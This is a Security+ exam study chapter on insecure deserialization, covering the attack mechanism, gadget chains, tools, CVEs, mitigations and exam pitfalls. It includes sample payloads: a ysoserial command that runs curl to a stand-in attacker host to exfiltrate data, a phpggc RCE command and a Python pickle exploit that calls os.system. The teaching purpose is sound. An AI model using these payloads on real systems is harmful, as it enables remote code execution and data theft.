This chapter covers insecure deserialization attacks, a critical vulnerability where attackers manipulate serialized objects to execute arbitrary code, escalate privileges, or perform other malicious actions. For the SY0-701 exam, this maps to Objective 2.3 (Threats, Vulnerabilities, and Mitigations) and is considered an advanced topic. Understanding insecure deserialization is essential for defending modern applications that rely on serialized data formats like JSON, XML, YAML, or binary protocols such as Java serialization or Python pickle. This chapter will explain the mechanism, real-world exploits, and mitigation strategies you need to know for the exam.
Jump to a section
Imagine you run a warehouse that receives shipments from suppliers. Each package arrives sealed and labeled with a barcode that the warehouse scanner reads to route it to the correct shelf. The barcode is just a serial number—it doesn't contain any instructions about what to do with the package. Now suppose a malicious shipper starts sending packages where the barcode itself is a malicious instruction: when scanned, it tells the warehouse robot to open the package and drop the contents into the 'hazardous waste' bin instead of the 'inventory' shelf. The robot blindly executes the barcode's command because it trusts the data. Insecure deserialization works similarly: an application receives serialized data (like a barcode) that includes not just object state but also instructions for how to construct and use the object. If the application doesn't validate the serialized data, an attacker can craft a malicious payload that, when deserialized, executes arbitrary code or manipulates objects. The warehouse's mistake is treating the barcode as trusted data; the application's mistake is treating serialized data as safe. The fix is to either cryptographically sign the serialized data (so you can verify its origin) or use only primitive data types that can't embed executable logic—like switching from barcodes that embed commands to barcodes that only contain a simple ID, and having the warehouse look up the ID in a trusted internal database.
What is Insecure Deserialization?
Serialization is the process of converting an object's state (its data and structure) into a format that can be easily stored or transmitted, such as a byte stream, JSON string, or XML document. Deserialization is the reverse process: reconstructing the object from that format. Insecure deserialization occurs when an application deserializes untrusted data without proper validation, allowing an attacker to control the object's properties or even execute arbitrary code.
The threat is not the serialized data itself, but the fact that many serialization formats can encode not just data but also instructions for object construction, including which class to instantiate and what methods to call. If an attacker can supply a malicious serialized object, they may be able to:
Execute arbitrary commands on the server (Remote Code Execution, RCE)
Escalate privileges by modifying object properties
Cause denial of service via resource exhaustion
Bypass authentication or authorization checks
The SY0-701 exam expects you to recognize scenarios where deserialization is used (e.g., session tokens, cookies, HTTP parameters, database records) and identify the risk when user-supplied data is deserialized.
How Insecure Deserialization Works Mechanically
To understand the attack, consider a Java application that uses serialization to store user session data. The session object might contain fields like username, role, and isAdmin. When a user logs in, the server serializes this object and sends it as a cookie. On subsequent requests, the server deserializes the cookie to retrieve the user's identity.
Here is a simplified example of a vulnerable Java class:
public class User implements Serializable {
private String username;
private String role;
private boolean isAdmin;
// getters and setters
}An attacker who intercepts the serialized cookie can modify the byte stream to change isAdmin from false to true. When the server deserializes the tampered data, it creates a User object with admin privileges. This is a simple example of object tampering.
More dangerous are attacks that exploit the deserialization process itself. In languages like Java, Python, PHP, and Ruby, serialization libraries often call special methods during deserialization (e.g., readObject() in Java, __reduce__() in Python, __wakeup() in PHP). Attackers can craft payloads that trigger these methods to execute arbitrary code.
For instance, a famous Java deserialization attack uses the ysoserial tool to generate payloads that exploit common libraries like Apache Commons Collections. The payload contains a chain of classes that, when deserialized, call Runtime.exec() to run a system command.
java -jar ysoserial-master.jar CommonsCollections1 'curl http://attacker.com/steal' > payload.binWhen the server deserializes payload.bin, it executes the curl command, exfiltrating data to the attacker.
Key Components, Variants, and Standards
Serialization Formats: Common formats include JSON (JavaScript Object Notation), XML (Extensible Markup Language), YAML (YAML Ain't Markup Language), and binary formats like Java's ObjectOutputStream, Python's pickle, PHP's serialize(), and Ruby's Marshal. The exam focuses on the risk, not the specific format, but you should know that JSON and XML are not inherently dangerous—danger arises when libraries allow code execution during deserialization (e.g., eval() in Python's pickle).
Gadget Chains: In Java and .NET, attackers chain together multiple classes (gadgets) that are available in the application's classpath. Each gadget performs a small action, and together they lead to RCE. Common libraries with known gadget chains include Apache Commons Collections, Spring, and Jackson.
CVEs: Notable CVEs include CVE-2015-7501 (Apache Commons Collections), CVE-2017-7525 (Jackson), and CVE-2019-12384 (Jackson). These are often cited in exam questions.
OWASP: The OWASP Top 10 includes Insecure Deserialization as a category (A08:2021). The exam follows similar categorization.
How Attackers Exploit Insecure Deserialization
Attackers follow these steps:
Identify Serialization: They look for clues like binary data in HTTP requests (e.g., Base64-encoded Java serialization stream), or parameters that look like serialized formats (e.g., O:4:"User":1:{s:4:"role";s:5:"admin";} in PHP).
Craft Payload: Using tools like ysoserial (Java), pickle (Python), or phpggc (PHP), they generate a malicious serialized object that exploits a known gadget chain.
Deliver Payload: They send the payload to the server via a cookie, form field, or any deserialization endpoint.
Trigger Execution: The server deserializes the payload, which triggers the gadget chain and executes the attacker's code (e.g., reverse shell, data exfiltration).
How Defenders Mitigate Insecure Deserialization
Avoid Deserialization of Untrusted Data: The most effective mitigation is to not deserialize data from untrusted sources. Use alternative data formats like JSON or XML with safe parsers that do not execute code.
Integrity Checks: Use digital signatures or HMACs to ensure serialized data hasn't been tampered with. For example, sign the serialized object with a server-side secret and verify the signature before deserialization.
Allow Lists: Restrict deserialization to only known safe classes. In Java, you can implement a custom ObjectInputStream that overrides resolveClass() to check a whitelist.
Run-Time Monitoring: Use security tools to detect deserialization attacks, such as Web Application Firewalls (WAF) that can identify known payload patterns (e.g., ysoserial signatures).
Regular Updates: Keep libraries patched to remove known gadget chains.
Real Command/Tool Examples
- ysoserial: A proof-of-concept tool for generating Java deserialization payloads.
java -jar ysoserial-master.jar CommonsCollections1 'command' > payload.ser- PHPGGC: A PHP gadget chain generator.
phpggc Laravel/RCE1 system 'id' | base64- Python pickle: Can be used to create malicious pickles.
import pickle
class Exploit(object):
def __reduce__(self):
import os
return (os.system, ('id',))
malicious = pickle.dumps(Exploit())For the exam, you won't need to write these commands, but you should recognize that they are used to generate payloads.
Identify Serialization in Use
The attacker first determines that the application uses serialization to handle data. This can be discovered by observing HTTP requests that contain binary data (e.g., Base64-encoded Java serialization stream starting with `aced0005`), or by noticing patterns like `O:4:"User":...` in PHP. Tools like Burp Suite can help decode and inspect these values. The key is to find any input that is deserialized on the server side, such as cookies, form parameters, or database records. The attacker will look for endpoints that return or accept serialized objects. This step is critical because without serialization, the attack is not possible.
Analyze the Serialization Format
Once a serialized object is found, the attacker determines the format and the language used (e.g., Java, PHP, Python). For Java, the serialized stream begins with magic bytes `aced0005`. For PHP, the serialized string often looks like `a:1:{s:4:"test";s:4:"data";}`. For Python pickle, the data often includes `g` and `c` tokens. The attacker may also examine the application's error messages or source code (if available) to identify the exact serialization library (e.g., Java's `ObjectInputStream`, PHP's `unserialize()`, Python's `pickle.loads()`). This analysis helps the attacker choose the right gadget chain or exploit technique.
Craft Malicious Payload
Using a tool like `ysoserial` (Java), `phpggc` (PHP), or a custom Python script, the attacker generates a serialized object that contains a gadget chain leading to RCE or other malicious actions. The payload is tailored to the libraries present on the target server. For example, if the server uses Apache Commons Collections, the attacker uses the CommonsCollections1 gadget chain. The payload might include a command to execute a reverse shell or exfiltrate data. The attacker may also modify object properties to escalate privileges (e.g., changing `isAdmin` to `true`). The crafted payload is then encoded (e.g., Base64) if needed for transmission.
Deliver the Payload
The attacker sends the malicious serialized object to the server via the deserialization endpoint. This could be in a cookie (e.g., `session`), a hidden form field, or an HTTP header. The attacker uses tools like Burp Repeater or a custom script to send the request. The server receives the data and passes it to the deserialization function. The attacker monitors the response to see if the payload executed (e.g., a delay, error message, or outbound connection). If the server deserializes the data without validation, the attack proceeds.
Exploit and Escalate
Upon deserialization, the malicious object triggers the gadget chain, executing the attacker's code. This could result in a reverse shell, command execution, or data theft. The attacker then uses this foothold to move laterally, escalate privileges, or exfiltrate sensitive data. For example, the attacker might run `whoami` to confirm RCE, then download additional tools. The attacker may also modify the serialized object again to perform further actions, such as creating a backdoor user. The entire attack chain is often automated, but the key is that the initial deserialization step is the point of compromise.
Scenario 1: Java Application Session Hijacking
A SOC analyst notices that multiple user accounts are being compromised with elevated privileges. Upon investigation, they find that the application uses Java serialization for session tokens stored in cookies. The analyst uses Burp Suite to decode a session cookie and sees it's a Base64-encoded Java serialized object. They decode it and see fields like username, role, and isAdmin. The analyst suspects tampering. They check the server logs and see that some requests have modified cookie values that, when decoded, show isAdmin=true for users who are not admins. The correct response is to implement integrity checks (e.g., HMAC) on the session cookie and switch to using encrypted JSON Web Tokens (JWTs) instead of Java serialization. A common mistake is to assume that Base64 encoding provides security—it does not, as it is easily reversible.
Scenario 2: PHP Deserialization RCE
A security engineer is performing a penetration test on a PHP application. They find that the application uses unserialize() on user-supplied data from a data parameter. They use phpggc to generate a payload for a known gadget chain in the Laravel framework. They send the payload in the data parameter and receive a reverse shell. The engineer reports the vulnerability. The correct remediation is to avoid deserializing untrusted data entirely or to use a whitelist of allowed classes. A common mistake is to try to filter blacklist certain classes, which is ineffective because attackers can find new gadget chains.
Scenario 3: Python Pickle in a Machine Learning Pipeline
A data science team uses Python pickle to serialize trained models for later use. An attacker gains access to the model storage and replaces a model file with a malicious pickle that executes code when loaded. The attacker's payload creates a backdoor. The SOC analyst detects unusual outbound traffic from the server after the model is loaded. The correct response is to use a safer serialization format like JSON or to implement signature verification for model files. A common mistake is to rely on file permissions alone, which can be bypassed if the attacker has write access.
What SY0-701 Tests on Insecure Deserialization
The exam expects you to:
Identify scenarios where insecure deserialization can occur (e.g., session tokens, cookies, HTTP parameters, database records).
Recognize the potential impact: remote code execution, privilege escalation, denial of service.
Know mitigation techniques: avoid deserialization of untrusted data, use integrity checks (digital signatures/HMACs), implement allow lists of classes, and keep libraries updated.
Understand that JSON and XML are not inherently vulnerable, but libraries that allow code execution during parsing (e.g., eval() in Python's pickle) are dangerous.
Common Wrong Answers and Why Candidates Choose Them
"Use encryption to protect serialized data" – Encryption prevents eavesdropping but does not prevent tampering. An attacker can still modify encrypted data if they have access to the ciphertext (bit-flipping attacks). Integrity checks (signatures) are needed.
"Use Base64 encoding" – Base64 is encoding, not encryption. It does not provide integrity or confidentiality. Candidates often confuse encoding with encryption.
"Blacklist dangerous classes" – Blacklisting is ineffective because attackers can find alternative gadget chains. Whitelisting is recommended.
"Only Java is vulnerable" – Insecure deserialization affects many languages, including PHP, Python, Ruby, and .NET.
Specific Terms and Values
- ysoserial – Java deserialization payload generator.
- phpggc – PHP gadget chain generator.
- Java serialization magic bytes: aced0005.
- OWASP Top 10: A08:2021 – Insecure Deserialization.
- CVEs: CVE-2015-7501, CVE-2017-7525.
Trick Questions
- A question might describe a scenario where JSON is deserialized using a safe parser (e.g., json.loads() in Python) and ask if it's vulnerable. The answer is no, because JSON does not execute code. But if the parser allows arbitrary object instantiation (e.g., jsonpickle), it is vulnerable.
- Another trick: a question might say the application uses HMAC for integrity, but the HMAC is computed after serialization. That is correct. However, if the HMAC is computed on the serialized data but the deserialization checks the signature incorrectly (e.g., using a weak comparison), it may still be vulnerable.
Decision Rule for Eliminating Wrong Answers If a question asks about mitigating insecure deserialization, look for answers that involve integrity verification (signatures/HMACs), avoiding deserialization of untrusted data, or whitelisting classes. Eliminate answers that only mention encryption or encoding. If the question is about detecting an attack, look for tools like Burp Suite or WAFs that can identify serialized payloads.
Insecure deserialization occurs when an application deserializes untrusted data without proper validation, allowing attackers to modify object properties or execute arbitrary code.
Common serialization formats include Java serialization (magic bytes `aced0005`), PHP serialize, Python pickle, and Ruby Marshal.
Attackers use tools like `ysoserial` (Java) and `phpggc` (PHP) to generate malicious payloads exploiting known gadget chains.
Mitigations include: avoid deserializing untrusted data, use integrity checks (digital signatures/HMACs), implement allow lists of classes, and keep libraries patched.
The OWASP Top 10 (A08:2021) includes Insecure Deserialization as a vulnerability category.
Notable CVEs: CVE-2015-7501 (Apache Commons Collections), CVE-2017-7525 (Jackson).
Encryption alone does not prevent deserialization attacks; integrity protection is required.
JSON and XML deserialization are safe only if the parser does not allow code execution.
These come up on the exam all the time. Here's how to tell them apart.
Insecure Deserialization
Exploits deserialization of objects
Can lead to RCE, privilege escalation, or DoS
Mitigated by avoiding untrusted deserialization, using integrity checks, and whitelisting classes
Often uses gadget chains to execute code
Commonly found in Java, PHP, Python, Ruby
SQL Injection
Exploits injection of SQL commands
Can lead to data theft, authentication bypass, or DoS
Mitigated by parameterized queries and input validation
Uses SQL syntax to manipulate database queries
Commonly found in any application using SQL databases
Mistake
Insecure deserialization only affects Java applications.
Correct
Many languages and frameworks are vulnerable, including PHP (`unserialize()`), Python (`pickle`), Ruby (`Marshal`), and .NET (`BinaryFormatter`). The exam covers all of these.
Mistake
Base64 encoding protects serialized data from tampering.
Correct
Base64 is encoding, not encryption. It can be easily decoded and modified by an attacker. Integrity protection requires a cryptographic signature or HMAC.
Mistake
Using JSON or XML for serialization is always safe.
Correct
JSON and XML themselves are safe, but libraries that parse them may allow code execution if they support arbitrary object instantiation (e.g., `jsonpickle` in Python, `XmlSerializer` in .NET with certain configurations). Always use safe parsers.
Mistake
Encrypting serialized data prevents deserialization attacks.
Correct
Encryption prevents an attacker from reading the data but does not prevent tampering. An attacker can still modify ciphertext (bit-flipping) or use padding oracle attacks. Integrity checks are necessary.
Mistake
Insecure deserialization is only a risk for web applications.
Correct
Any application that deserializes untrusted data is at risk, including desktop applications, mobile apps, and even firmware. The exam focuses on web applications, but the concept applies broadly.
Insecure deserialization is a vulnerability where an application deserializes data from an untrusted source without proper validation. Attackers can manipulate serialized objects to execute arbitrary code, escalate privileges, or cause denial of service. For the exam, remember that the risk arises when the deserialization process can be controlled by an attacker, often through gadget chains in Java or similar mechanisms in other languages.
The most effective prevention is to avoid deserializing untrusted data altogether. Use alternative data formats like JSON or XML with safe parsers that do not execute code. If you must deserialize, implement integrity checks (e.g., HMAC) to ensure data hasn't been tampered with, use allow lists of classes that are permitted for deserialization, and keep all libraries updated to remove known gadget chains. For the exam, know that whitelisting is better than blacklisting.
Gadget chains are sequences of classes that, when deserialized, together perform a malicious action like executing a system command. Each 'gadget' is a legitimate class in the application's classpath that has methods called during deserialization. Attackers chain multiple gadgets to achieve remote code execution. Tools like `ysoserial` automate the construction of these chains. The exam expects you to understand that gadget chains are used in Java and .NET deserialization attacks.
JSON itself is just a data format and does not execute code. However, some JSON parsing libraries (e.g., `jsonpickle` in Python, `Jackson` with default typing in Java) can be configured to instantiate arbitrary classes, leading to deserialization vulnerabilities. For the exam, remember that the vulnerability depends on the library and its configuration, not the format itself.
Serialization converts an object's state into a format that can be stored or transmitted (e.g., byte stream, JSON string). Deserialization reconstructs the object from that format. Insecure deserialization is the vulnerability that occurs during the deserialization step when the data is untrusted. For the exam, you should know that serialization is used for session management, caching, and remote communication, and that deserialization of untrusted data is dangerous.
Common tools include `ysoserial` for Java, `phpggc` for PHP, and `pickle` for Python. These tools generate malicious serialized objects that exploit known gadget chains. For the exam, you should recognize these tools by name and understand that they are used to create payloads, not to scan for vulnerabilities.
Encryption alone does not protect against tampering. An attacker can modify the ciphertext (bit-flipping) or exploit padding oracle attacks to change the decrypted data. To ensure integrity, you need a cryptographic signature or HMAC that is verified before deserialization. For the exam, remember that encryption provides confidentiality, not integrity.
You've just covered Insecure Deserialization Attacks — now see how well it sticks with free SY0-701 practice questions. Full explanations included, no account needed.
Done with this chapter?